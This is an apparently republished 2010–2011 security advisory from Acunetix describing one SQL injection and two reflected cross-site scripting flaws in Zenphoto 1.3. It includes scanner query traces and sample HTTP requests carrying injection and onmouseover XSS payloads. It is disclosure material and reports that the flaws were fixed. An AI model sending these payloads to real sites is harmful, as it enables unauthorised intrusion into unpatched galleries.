Zenphoto 1.3 Security problems

2011.10.12
Credit: Bogdan Calin
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a number of security problems discovered by Acunetix WVS in the popular web gallery application Zenphoto. Zenphoto is a standalone gallery CMS that just makes sense and doesn?t try to do everything and your dishes. We hope you agree with our philosophy: simpler is better. Don?t get us wrong though ? Zenphoto really does have everything you need for web media gallery management. The following web vulnerabilities were found in Zenphoto Version 1.3; 1. SQL injection in ?/zenphoto_1_3/zp-core/full-image.php?, parameter ?a?. 2. Cross-site Scripting vulnerability in ?/zenphoto_1_3/zp-core/admin.php?, parameter ?from?. 3.Cross-site Scripting vulnerability in ?/zenphoto_1_3/zp-core/admin.php?, parameter ?user?. Technical details about each web vulnerability are below; 1. SQL injection in ?/zenphoto_1_3/zp-core/full-image.php?, parameter ?a?. Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65 Additional details: SQL Query: SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/ ACUEND" Stack trace: 1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\n ACUEND"", [boolean] false) 2. query_full_array([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\n ACUEND"") 3. getAlbumInherited([string] "1ACUSTART'"*/\n ACUEND", [string] "album_theme", [NULL] ) 4. themeSetup([string] "1ACUSTART'"*/\n ACUEND") As you can see in the SQL query (or the stack trace), in order to alter the SQL statement sent to the database you need to use a double qoute (not a single one, as in most SQL injections). Sample HTTP request: GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug. jpg&q=75 HTTP/1.1 Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect: enabled Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 2. Cross-site Scripting vulnerability in ?/zenphoto_1_3/zp-core/admin.php?, parameter ?from?. Attack details URL encoded GET input from was set to ? onmouseover=prompt(934419) bad=?. The input is reflected inside a tag element between double quotes. Sample HTTP request: GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419 %29%20bad%3d%22 HTTP/1.1 Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 3. Cross-site Scripting vulnerability in ?/zenphoto_1_3/zp-core/admin.php?, parameter ?user?. Attack details URL encoded POST input user was set to ? onmouseover=prompt(932890) bad=?. The input is reflected inside a tag element between double quotes. Sample HTTP Request: POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1 Content-Length: 149 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=% 2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad% 3d%22 These vulnerabilities were reported to the Zenphoto team on 22/7/2010 via the trac system on their website and they were fixed in latest version of Zenphoto. If you are using Zenphoto, download the latest version from their website. - Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix

References:

http://www.securityfocus.com/bid/43021
http://www.securityfocus.com/archive/1/archive/1/513525/100/0/threaded
http://www.acunetix.com/blog/web-security-zone/articles/zenphoto-13-advisory/
http://secunia.com/advisories/41342
http://packetstormsecurity.org/1009-exploits/zenphoto-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top